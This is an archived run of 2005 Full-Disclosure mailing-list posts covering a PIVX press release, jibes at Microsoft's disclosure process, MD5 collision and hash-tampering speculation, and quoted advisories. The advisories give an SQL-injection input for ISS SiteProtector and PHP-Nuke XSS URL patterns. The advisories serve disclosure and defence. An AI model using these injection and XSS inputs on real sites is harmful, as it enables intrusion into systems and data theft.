safe-harbor provided by the Private Securities Litigation Reform Act of
1995. Such forward-looking statements relate to, among other things: (1)
PIVX's successful integration of Threat Focus; (2) PIVX's expected
revenue and earnings growth; and (3) estimates regarding the size of
target markets. These statements are qualified by important factors that
could cause PIVX actual results to differ materially from those
reflected by the forward-looking statements. Such factors include but
are not limited to: (1) PIVX's ability to obtain development financing
as and when needed, (2) PIVX's ability to generate and sustain
profitable operations; (3) the market's acceptance of PIVX's products
and services; (4) significant competition from other network security
companies and operating system providers with significantly greater
technological, marketing and financial resources, and (5) PIVX's ability
to protect its intellectual property. These statements, and other
forward-looking statements, are not guarantees of future performance and
involve risks and uncertainties as more fully described in the Company's
periodic filings with the Securities and Exchange Commission.
CONTACT: Redwood Consultants, LLC
Jens Dalsgaard, 415-884-0348
JNSDaol.com
SOURCE: PIVX Solutions, Inc.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Danny (nocmonkeygmail.com)
Date: Fri Apr 08 2005 - 15:26:20 CDT
On Apr 8, 2005 2:59 PM, lor.tharholmhushmail.com
<lor.tharholmhushmail.com> wrote:
> .:.
> :|:
> .:|:.
> ::|::
> :. ::|:: .:
> :|:. .::|::. .:|:
> ::|:. :::|::: .:|:;
> `::|:. :::|::: .:|::'
> ::|::. :::|::: .::|:;
> `::|::. :::|::: .::|::'
> :::|::. :::|::: .::| ::;
> `:::|::. :::|::: .::|::;'
> `::. `:::|::. :::|::: .::|::;' .:;'
> `:::.. ?::|::. :::|::: .::|::? ..::;'
> `:::::. ':|::. :::|::: .::|:' ,::::;'
> `:::::. ':|:::::|:::::|:' :::::;'
> `:::::.:::::|::::|::::|::::.,:::;'
> ':::::::::|:::|:::|:::::::;:'
> ':::::::|::|::|:::::::''
> `::::::::::;'
> .:;'' ::: ``::.
> :':':
>
> CHA!
Check out http://www.marijuanaparty.com/
High fives,
Ketchup Eyes
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Micheal Espinola Jr (michealespinolagmail.com)
Date: Fri Apr 08 2005 - 15:26:27 CDT
On Apr 8, 2005 4:17 PM, Georgi Guninski <guninskiguninski.com> wrote:
> On Fri, Apr 08, 2005 at 12:21:05PM -0700, Microsoft Security Response
> Center wrote:
> > If you believe you have found a security vulnerability affecting a
> > Microsoft product, we would like to work with you to investigate it.
> >
>
> hahahahahaha
>
> m$ doing social engineering on fd, this is a joke.
>
> *You would rather they ignore the issue?*
> basically they want your 0days so billg becomes more rich.
>
> *Wow, jealous much?*
> --
> where do you want bill gates to go today?
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
--
ME2
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Danny (nocmonkeygmail.com)
Date: Fri Apr 08 2005 - 15:30:38 CDT
On Apr 8, 2005 4:16 PM, Jason Coombs <jasoncscience.org> wrote:
> Lotus Fund Acquires Controlling Interest in PIVX Solutions From
> Co-Founders; Seeks to Leverage Company's Unique Windows Security Technology
>
> NEWPORT BEACH, Calif.--(BUSINESS WIRE)--April 7, 2005--PIVX Solutions,
> Inc. (OTCBB:PIVX), the leader in next generation Windows Host-Based
> Intrusion Prevention software, announces today that the private equity
> firm Lotus Fund has increased their holdings in PIVX to become the
> controlling shareholder of the company.
>
> "We are very excited about the IT security industry, and we view host
> intrusion prevention as the next significant area of growth within that
> industry," said Tydus Richards, director at Lotus Fund and the new
> Chairman of the Board at PIVX. "We evaluated many different companies in
> this space and are impressed with the technology, the team and the
> momentum at PIVX. Given the continually growing threats to PC users,
> PIVX's products provide the protection that Windows users must have to
> be truly protected against hackers and the malware they deploy. The
> co-founders of PIVX have a legacy to be proud of and now we are
> assembling the team to take the Company to the next level."
>
> The company's primary software product, Qwik-Fix Pro, is designed to
> proactively block known and unknown software threats in all versions of
> Microsoft Windows and Internet Explorer. Using Active System Hardening
[...]
What is this a press release mailing list? Full-pivx-disclosure?
PIVX gives my Windows box a hard-on-ing.
...D
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Jason Coombs (jasoncscience.org)
Date: Fri Apr 08 2005 - 15:41:31 CDT
Georgi Guninski wrote:
> basically they want your 0days
> so billg becomes more rich.
Aloha, Georgi.
If only it were a simple business motive, everyone could dismiss it as such.
The real motive is more sinister.
Microsoft wants to perpetuate the misperception that secrecy makes people safer.
You and I and much of FD know this is not true, and anyone who has been in business for any length of time knows that if we could only disclose our secrets without having our lives destroyed as a result, we could prove beyond any doubt that business is the most harmful force of destruction that exists today.
We all go on with our daily lives believing that our neighbor won't harm themselves by disclosing their secrets, so we don't disclose ours. It is a perpetual stalemate.
Business depends on secrets for viability.
Without business, governments collapse and the World enters War Version 3.
Coincidence that Microsoft gets everything right on the third try?
Microsoft is attempting nothing short of social engineering to spread the worldwide belief that business stability equals safety for all.
Microsoft has grown influential enough that they now care deeply about world stability. They depend on it for profit growth, in fact.
The fact is, a world war is far more likely when secrets become compulsory. When good people become afraid to speak the truth, war is guaranteed.
Microsoft won't believe this until it is too late. Therefore, good people must stand up now and speak the truth.
MICROSOFT: STOP THE WAR! NO MORE SECRETS!
Regards, and best wishes,
Jason Coombs
jasoncscience.org
-----Original Message-----
From: Georgi Guninski <guninskiguninski.com>
Date: Fri, 8 Apr 2005 23:17:08
To:full-disclosurelists.grok.org.uk
Subject: Re: [Full-disclosure] How to Report a Security Vulnerability to
Microsoft
On Fri, Apr 08, 2005 at 12:21:05PM -0700, Microsoft Security Response Center wrote:
> If you believe you have found a security vulnerability affecting a
> Microsoft product, we would like to work with you to investigate it.
>
hahahahahaha
m$ doing social engineering on fd, this is a joke.
basically they want your 0days so billg becomes more rich.
--
where do you want bill gates to go today?
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Jason Coombs (jasoncscience.org)
Date: Fri Apr 08 2005 - 15:47:38 CDT
nocmonkeygmail.com wrote:
> What is this a press release mailing
> list? Full-pivx-disclosure?
So it's okay for anonymous cowards who want to perpetrate financial crimes to post nonsense to the list, but I'm not allowed to?
Nice.
Jason Coombs
jasoncscience.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Danny (nocmonkeygmail.com)
Date: Fri Apr 08 2005 - 16:05:06 CDT
On Apr 8, 2005 4:44 PM, Jason Coombs <jasoncscience.org> wrote:
> nocmonkeygmail.com wrote:
> > What is this a press release mailing
> > list? Full-pivx-disclosure?
>
> So it's okay for anonymous cowards who want to perpetrate financial crimes to post
> nonsense to the list, but I'm not allowed to?
>
> Nice.
Shouldn't you let PIVX decide what to defend and what not to defend?
...D
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Morning Wood (se_cur_ityhotmail.com)
Date: Fri Apr 08 2005 - 16:16:06 CDT
> On Fri, Apr 08, 2005 at 12:21:05PM -0700, Microsoft Security Response
Center wrote:
> > If you believe you have found a security vulnerability affecting a
> > Microsoft product, we would like to work with you to investigate it.
> >
>
> hahahahahaha
>
> m$ doing social engineering on fd, this is a joke.
this is basicly the same response I had from my OWA advisory ...
>VI. VENDOR RESPONSE
>
>Microsoft has reviewed the issue and has made the determination that
>while a bug fix may be implemented in a future service pack, a security
>advisory/patch will not be released for this issue
therefore, in the interest of everones security, iDefense released the
advisory ( as did I ) without a patch being released first.
it is quite possible they ( Microsoft ) are trying to make out like they
were'nt contacted before said advisory was released.... but that is just my
opinion on observation.
my 2 bits,
Donnie Werner
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Thierry Zoller (Thierrysniff-em.com)
Date: Fri Apr 08 2005 - 17:00:42 CDT
Dear Barry,
b> Of course it's possible. All hashes, by their very nature, have
b> collisions. The only way to have a truly unique identifier is to use
b> the actual content of the file (or chunk) itself. The minute you
b> distill the content down to a hash, you're guaranteeing that collisions
b> will occur.
You are correct of course, the possibility is there. I was refering to
the fact that it is possible in another post of mine, however the possibility
of collisions happening "naturaly" is "not very likely" to say at least.
I still need to hear about anybody who found a non fabricated md5 collision
in the wild..on files.
b> somewhat rare.
:) Warm food at MC Donalds is "somewhat rare". Natural occuring md5 (or
coll. in sophisticated hash functions in general) are VERY rare not to
say virtualy impossible. AFAIK <-
b> Regarding corrupt files via P2P protocols... no file transfered via P2P
b> has _ever_ tranferred bad data and wound up corrupt, right? :)
b> /friendly sarcasm.
Hehe, got that one :)
--
Thierry Zoller
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Thierry Zoller (Thierrysniff-em.com)
Date: Fri Apr 08 2005 - 17:05:09 CDT
Dear Jason,
J> I think that entirely depends on the format the file is distributed in.
J> You could take a zipfile and pad it in non critical areas to change the
J> MD5 without creating a substantial difference in the deliverable
J> content. You could do the same with gzip or bzip formatted files. You
J> could also pad any embedded jpeg images to engineer a collision. There
J> are quite a few opportunities where this method could be used to twiddle
J> the new MD5 without materially changing the content.
Clever approach there, haven't thought about that beforehand.
J> Software that is ~150M in size, it gets redistributed as a new file that
J> is 160M is size but has a collision with your software which is also
J> 160M in size. I imagine there would be some computational time involved
J> to find the appropriate collision but a lot less computational time than
J> finding a perfect match to the original.
If I understood your point correctly and if my knowledge about hash
algos is correct then to my believe the computational time to generate
a collision is exactly the same for the perfect match as it would be
to use an existing file to create a potenatial collision.
--
Thierry Zoller
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: sHz (shaondgmail.com)
Date: Fri Apr 08 2005 - 18:16:39 CDT
I don't know how Windows IT pro magazine even came up with this silly
idea. Everyone (almost) knows that nothing remains impenetrable for
long! Not only that, but these contests give certain people
(managers/some admins) a false sense of security.
Then again, I want to see the box hacked to shreds :-)
sHz
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Astharot (astharotzone-h.org)
Date: Fri Apr 08 2005 - 13:52:21 CDT
The graphical statistics for the year 2004 are finally ready! They also
contains excerpts of the year 2002 amd 2003 when needed.
There are two files
a nice PDF document which can be downloaded here
http://www.zone-h.org/download/file=5392/
while the full set of data in txt format, ready to be imported in your
spreadsheet can be downloaded here:
http://www.zone-h.org/download/file=5393/
The PDF documents contain a useful disclaimer about Zone-H activity,
read it please. You might be disppointed discovering that this year we
made no comments on the graphs. It is simply because the graphs are
self-talking.
Beside this, we always get emails like: "hey, why don't you make a graph
comparing the different webservers? It might be useful!" and "hey, why
did you do that graph comparing the webserver? It's useless!". To avoid
this, this year we did all possible graphs, up to you which one to
consider and how to interpret it.
I just want to add one comment: the tendence is to break through the
application level, we started to tell it a couple of years ago, much
earlier than anyone else. This is possible thanks to having the large
database as we have.
Enjoy the statistics but remember that this material is copyrighted and
you can use it under the same license its currently serving our website.
At the end of the PDF file you will find the details
Enjoy!
SyS64738 - Roberto Preatoni
astharot - Gerardo Di Giacomo
www.zone-h.org
Original article:
- http://zone-h.org/en/news/read/id=4457/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: n3td3v (xploitablegmail.com)
Date: Fri Apr 08 2005 - 20:20:32 CDT
On Apr 9, 2005 12:16 AM, sHz <shaondgmail.com> wrote:
> I don't know how Windows IT pro magazine even came up with this silly
> idea. Everyone (almost) knows that nothing remains impenetrable for
> long! Not only that, but these contests give certain people
> (managers/some admins) a false sense of security.
>
> Then again, I want to see the box hacked to shreds :-)
>
> sHz
Hi,
Remember the end goal for these morons is to sell more magazines. If
you read the website, the guy is going to do a big feature on all the
events that take place before/middle and after the contest. They know
people will buy the magazine to read it, thats why the contest is
being held.
Read more about what I think here:
http://blog.360.yahoo.com/blog-DDhkxBU_KLIDKLXKywM-?l=6&u=11&mx=44&lmt=5&p=137
Thanks, n3td3v
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Jason (securitybrvenik.com)
Date: Fri Apr 08 2005 - 21:25:11 CDT
Thierry Zoller wrote:
> Dear Jason,
>
> J> I think that entirely depends on the format the file is distributed in.
> J> You could take a zipfile and pad it in non critical areas to change the
> J> MD5 without creating a substantial difference in the deliverable
> J> content. You could do the same with gzip or bzip formatted files. You
> J> could also pad any embedded jpeg images to engineer a collision. There
> J> are quite a few opportunities where this method could be used to twiddle
> J> the new MD5 without materially changing the content.
>
> Clever approach there, haven't thought about that beforehand.
Different approaches are rarely thought about beforehand. If they were
explored deeply we might have found efficiencies and complications that
would have been avoided. This security stuff might not even exist. We
would also never make progress.
>
> J> Software that is ~150M in size, it gets redistributed as a new file that
> J> is 160M is size but has a collision with your software which is also
> J> 160M in size. I imagine there would be some computational time involved
> J> to find the appropriate collision but a lot less computational time than
> J> finding a perfect match to the original.
>
> If I understood your point correctly and if my knowledge about hash
> algos is correct then to my believe the computational time to generate
> a collision is exactly the same for the perfect match as it would be
> to use an existing file to create a potenatial collision.
>
I've not looked into it to be honest. I am thinking aloud.
Are there cases where different bits will have a predictable and
definable impact on the resulting hash? Does a null byte have a more
defined impact than a non null byte? Can you use a minimal impact byte
as padding and more impactful byte sequences to complete the collision?
It was once said that you could not realistically create two difference
sets of data that would cause a hash collision.
It was once said that you could not exploit heap overflows and that
stack overflows did not allow for control of the machine.
It was once thought that you could not use a format string to create an
exploitable condition.
I see enough opportunities for motivated people to do the research and
create a solution that is not computationally prohibitive. I would not
be surprised if this happens in relatively short time.
To use the existence of a hash and size as justification for a legal
assault against a person that appears to be providing content which is
under protection of some law presents an interesting area of exploration
in the courts for the right team. It was once thought that being found
guilty by a jury was sufficient to put someone to death. DNA has changed
that!
The only difference between theory and reality is implementation.
I think I am done with the thread on FD. Apologies to the myopic
thinkers among us.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: grey hat (greyhat007gmail.com)
Date: Fri Apr 08 2005 - 21:36:52 CDT
Its www.iss.net and not www.iss.com....
On Apr 8, 2005 12:25 PM, Francisco Amato <famatoinfobyte.com.ar> wrote:
> ||
> || [ISR]
> || Infobyte Security Research
> || www.infobyte.com.ar
> || 04.08.2005
> ||
>
> .:: SUMMARY
>
> ISS - SiteProtector Console Sql-Injection
>
> Version: 2.0.5.690, It is suspected that all previous versions of
> SiteProtector Console
> are vulnerable.
>
> .:: BACKGROUND
>
> SiteProtector is a security management system that provides a centralized
> view and analysis of network,
> server, and desktop protection agents and appliances.
>
> http://www.iss.com
>
> .:: DESCRIPTION
>
> A Sql-injection vulnerability affect SiteProtector Console
> This issue is due to a failure of the application to securely copy
> user-supplied data into
> fields "Tag Name" and "Object Name" of Incidents/Exception that user create
> or modify.
>
> Simple string use: "'"
>
> Error that display when it make the injection:
>
> ######################BEGIN############################
>
> A Database or SQL Error occurred while working with Site Rules.
> net.iss.rssp.gui.site.analysis.exceptions.CommonSiteRuleException
> at
> net.iss.rssp.gui.site.analysis.AnalysisDataManager.throwCommonSiteRuleExcept
> ion(AnalysisDataManager.java:442)
> at
> net.iss.rssp.gui.site.analysis.AnalysisDataManager.createSiteFilter(Analysis
> DataManager.java:350)
> at
> net.iss.rssp.gui.site.analysis.command.AddEditSiteRuleCommand.execute(AddEdi
> tSiteRuleCommand.java:48)
> at
> net.iss.command.CommandTemplate.templateExecute(CommandTemplate.java:179)
> at net.iss.command.CommandHandler.executeCommand(CommandHandler.java:148)
> at net.iss.command.CommandHandler.run(CommandHandler.java:116)
>
> A database error occurred in the method "createNewSiteRule".
> net.iss.rssp.entity.exceptions.SiteRuleException
> at
> net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:
> 357)
> at
> net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBroke
> rImpl.java:211)
> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
> at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at
> net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.jav
> a:22)
> at
> net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java
> :114)
> at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
> at sun.rmi.transport.Transport$1.run(Unknown Source)
> at java.security.AccessController.doPrivileged(Native Method)
> at sun.rmi.transport.Transport.serviceCall(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
> at java.lang.Thread.run(Unknown Source)
>
> Database Error
> SQL State = 42000
> Vendor code = 105
> Vendor msg = [42000][Microsoft][ODBC SQL Server Driver][SQL
> Server]Unclosed quotation mark before the character
> string '')
> AND NOT EXISTS (SELECT 1
> FROM ObservanceSiteFilters OSF WITH (NOLOCK)
> WHERE OSF.ObservanceID = OB.ObservanceID
> AND OSF.SiteFilterRuleID = 853)'.
>
> net.iss.rssp.db.DataAccessException
> at
> net.iss.rssp.server.database.DatabaseObjectHandlerBase.handleSQLException(Da
> tabaseObjectHandlerBase.java:75)
> at
> net.iss.rssp.server.database.SiteFilterHandler.write(SiteFilterHandler.java:
> 134)
> at
> net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:
> 348)
> at
> net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBroke
> rImpl.java:211)
> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
> at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at
> net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.jav
> a:22)
> at
> net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java
> :114)
> at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
> at sun.rmi.transport.Transport$1.run(Unknown Source)
> at java.security.AccessController.doPrivileged(Native Method)
> at sun.rmi.transport.Transport.serviceCall(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
> at java.lang.Thread.run(Unknown Source)
>
> Error Inserting into table ObservanceSiteFilters Code: 52000 DB Key: 0
>
> java.sql.SQLException: [42000][Microsoft][ODBC SQL Server Driver][SQL
> Server]Unclosed quotation mark before the
> character string '')
> AND NOT EXISTS (SELECT 1
> FROM ObservanceSiteFilters OSF WITH (NOLOCK)
> WHERE OSF.ObservanceID = OB.ObservanceID
> AND OSF.SiteFilterRuleID = 853)'.
>
> at ids.sql.IDSSocket.error(IDSSocket.java:325)
> at ids.sql.IDSSocket.verify(IDSSocket.java:270)
> at ids.sql.IDSPrepared.execute(IDSPrepared.java:578)
> at ids.sql.IDSPrepared.execute(IDSPrepared.java:559)
> at
> net.iss.rssp.server.database.SiteFilterHandler.write(SiteFilterHandler.java:
> 103)
> at
> net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:
> 348)
> at
> net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBroke
> rImpl.java:211)
> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
> at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at
> net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.jav
> a:22)
> at
> net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java
> :114)
> at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
> at sun.rmi.transport.Transport$1.run(Unknown Source)
> at java.security.AccessController.doPrivileged(Native Method)
> at sun.rmi.transport.Transport.serviceCall(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
> at java.lang.Thread.run(Unknown Source)
>
> java.sql.SQLException: [42000][Microsoft][ODBC SQL Server Driver][SQL
> Server]Unclosed quotation mark before the
> character string '')
> AND NOT EXISTS (SELECT 1
> FROM ObservanceSiteFilters OSF WITH (NOLOCK)
> WHERE OSF.ObservanceID = OB.ObservanceID
> AND OSF.SiteFilterRuleID = 853)'.
>
> at ids.sql.IDSSocket.error(IDSSocket.java:325)
> at ids.sql.IDSSocket.verify(IDSSocket.java:270)
> at ids.sql.IDSPrepared.execute(IDSPrepared.java:578)
> at ids.sql.IDSPrepared.execute(IDSPrepared.java:559)
> at
> net.iss.rssp.server.database.SiteFilterHandler.write(SiteFilterHandler.java:
> 103)
> at
> net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:
> 348)
> at
> net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBroke
> rImpl.java:211)
> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
> at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at
> net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.jav
> a:22)
> at
> net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java
> :114)
> at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
> at sun.rmi.transport.Transport$1.run(Unknown Source)
> at java.security.AccessController.doPrivileged(Native Method)
> at sun.rmi.transport.Transport.serviceCall(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
> at java.lang.Thread.run(Unknown Source)
>
> java.sql.SQLException: [42000][Microsoft][ODBC SQL Server Driver][SQL
> Server]Line 10: Incorrect syntax near '')
> AND NOT EXISTS (SELECT 1
> FROM ObservanceSiteFilters OSF WITH (NOLOCK)
> WHERE OSF.ObservanceID = OB.ObservanceID
> AND O'.
>
> at ids.sql.IDSSocket.error(IDSSocket.java:325)
> at ids.sql.IDSSocket.verify(IDSSocket.java:270)
> at ids.sql.IDSPrepared.execute(IDSPrepared.java:578)
> at ids.sql.IDSPrepared.execute(IDSPrepared.java:559)
> at
> net.iss.rssp.server.database.SiteFilterHandler.write(SiteFilterHandler.java:
> 103)
> at
> net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:
> 348)
> at
> net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBroke
> rImpl.java:211)
> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
> at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at
> net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.jav
> a:22)
> at
> net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java
> :114)
> at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
> at sun.rmi.transport.Transport$1.run(Unknown Source)
> at java.security.AccessController.doPrivileged(Native Method)
> at sun.rmi.transport.Transport.serviceCall(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
> at java.lang.Thread.run(Unknown Source)
>
> #######################END#############################
>
> .:: EXTRA
>
> We did not find any way to perform any unautorized actions or gain
> additional privileges
>
> .:: DISCLOSURE TIMELINE
>
> 04/01/2005 Initial vendor notification
> 04/06/2005 Initial vendor response
> 04/08/2005 Public disclosure
>
> .:: CREDIT
>
> Francisco Amato is credited with discovering this vulnerability.
> famato][at][infobyte][dot][com][dot][ar
>
> .:: LEGAL NOTICES
>
> Copyright (c) 2005 by [ISR] Infobyte Security Research.
> Permission to redistribute this alert electronically is granted as long as
> it is not
> edited in any way unless authorized by Infobyte Security Research Response.
> Reprinting the whole or part of this alert in any medium other than
> electronically
> requires permission from infobyte com ar
>
> Disclaimer
> The information in the advisory is believed to be accurate at the time of
> publishing
> based on currently available information. Use of the information constitutes
> acceptance
> for use in an AS IS condition. There are no warranties with regard to this
> information.
> Neither the author nor the publisher accepts any liability for any direct,
> indirect, or
> consequential loss or damage arising from use of, or reliance on, this
> information.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Scott Edwards (supadupagmail.com)
Date: Fri Apr 08 2005 - 22:18:41 CDT
On Apr 8, 2005 10:50 AM, Jason <securitybrvenik.com> wrote:
[snip]
> I think that entirely depends on the format the file is distributed in.
> You could take a zipfile and pad it in non critical areas to change the
> MD5 without creating a substantial difference in the deliverable
> content. You could do the same with gzip or bzip formatted files. You
> could also pad any embedded jpeg images to engineer a collision. There
> are quite a few opportunities where this method could be used to twiddle
> the new MD5 without materially changing the content.
>
> Here is the case I am thinking about.
>
[snip]
You can always use steganography
[http://en.wikipedia.org/wiki/Steganography]* for purposes of causing
the MD5 to change. There doesn't even have to be valid data to hide
in what I'll just reference as the "steganography metadata stream".
The key is to allow both copies to appear to operate the same, but are
clearly different when compared byte for byte. bitmaps, lossless or
lossy, just modify a few pixels. Find something that's not being
utilized, and modify it so the data type is still ok, but the data is
ever-so slightly different. Just think about crafty viruses like CIH
that relocated itself in unused areas in the executable.
After this, you'll have a hard time discerning between the origionals
and the fakes. You'll have more ground that'll need to be researched
to see if every varying signature is liable as a claimed infringment.
Even if it's distorted, it's still plausible as a protected work - but
to what degree I can't say ** (how much milk does plain water need to
be to become milk? at what point isn't it water anymore?). Granted,
exclusive use of tainting the signature weakens P2P, as this is a
relative dependency.
Aside from all this, it's best to avoid the appearance of evil. I
won't vouch for anyone else's actions, but *do* exercise caution.
(caveat emptor, no two ways about it).
* Edit+Improve this article if you can.
** That's right, it's a security/disclosure mailing list - not an open
legislative discussion one.
I hope you've enjoyed my comments - and if not, no loss for me.
Thanks,
Scott Edwards
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Paul Laudanski (zxcastlecops.com)
Date: Sat Apr 09 2005 - 00:12:12 CDT
A cursory web search revealed...
On 4 Apr 2005, Maksymilian Arciemowicz wrote:
> - --- 1.Description --- PHP-Nuke is a Web Portal System, storytelling
[SNIP]
>
> - --- 2. XSS ---
> 2.0
> http://[HOST]/[DIR]/banners.php?op=EmailStats&name=sex&bid=[XSS]
>
> 2.1
> http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=TopRated&ratenum=[XSS]&ratetype=num
This has been a bug for over a year now:
http://www.waraxe.us/content-5.html
>
> 2.2
> http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=%3Ch1%3E50&ratetype=num
This too was pointed out nearly two years ago:
http://archives.neohapsis.com/archives/fulldisclosure/2003-q2/1213.html
>
> 2.3
> http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=viewlinkdetails&ttitle=[XSS]
>
